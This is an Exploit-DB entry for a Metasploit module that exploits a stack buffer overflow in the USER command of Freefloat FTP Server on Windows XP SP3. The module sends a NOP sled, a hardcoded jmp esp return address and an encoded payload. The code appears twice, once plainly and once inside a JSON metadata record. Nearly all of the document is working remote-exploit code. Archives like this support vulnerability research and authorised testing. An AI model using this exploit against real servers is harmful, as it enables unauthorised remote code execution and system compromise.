ID EDB-ID:17498
Type exploitdb
Reporter James Fitts
Modified 2011-07-07T00:00:00
Description
Freefloat FTP Server Buffer Overflow Vulnerability (MSF). Remote exploit for windows platform
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'Freefloat FTP Server Username Stack Overflow',
'Description' => %q{
This module exploits a buffer overflow found in the USER command of the Freefloat FTP server.
},
'Author' => [
'0v3r', # Initial Discovery
'James Fitts' # Metasploit Module
],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'URL', 'http://www.exploit-db.com/exploits/15689' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP3', { 'Ret' => 0x77def069 } ], # jmp esp from ADVAPI32.dll
],
'DisclosureDate' => 'Dec 05 2010',
'DefaultTarget' => 0))
end
def exploit
connect
print_status("Trying target #{target.name}...")
buf = make_nops(230) + [target.ret].pack('V')
buf << make_nops(50)
buf << payload.encoded
send_cmd( ['USER', buf] , false )
handler
disconnect
end
end
{"id": "EDB-ID:17498", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Freefloat FTP Server Buffer Overflow Vulnerability MSF", "description": "Freefloat FTP Server Buffer Overflow Vulnerability (MSF). Remote exploit for windows platform", "published": "2011-07-07T00:00:00", "modified": "2011-07-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/17498/", "reporter": "James Fitts", "references": [], "cvelist": [], "lastseen": "2016-02-02T07:59:10", "viewCount": 2, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-02-02T07:59:10", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-02T07:59:10", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://www.exploit-db.com/download/17498/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Ftp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Freefloat FTP Server Username Stack Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow found in the USER command of the Freefloat FTP server.\r\n\t\t\t},\r\n\t\t\t'Author' => [\r\n\t\t\t\t\t\t'0v3r',\t\t# Initial Discovery\r\n\t\t\t\t\t\t'James Fitts'\t# Metasploit Module\r\n\t\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'URL', 'http://www.exploit-db.com/exploits/15689' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows XP SP3', { 'Ret' => 0x77def069 } ], # jmp esp from ADVAPI32.dll\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Dec 05 2010',\r\n\t\t\t'DefaultTarget'\t=> 0))\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tbuf = make_nops(230) + [target.ret].pack('V')\r\n\t\tbuf << make_nops(50)\r\n\t\tbuf << payload.encoded\r\n\r\n\t\tsend_cmd( ['USER', buf] , false )\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "osvdbidlist": ["69621"]}
{}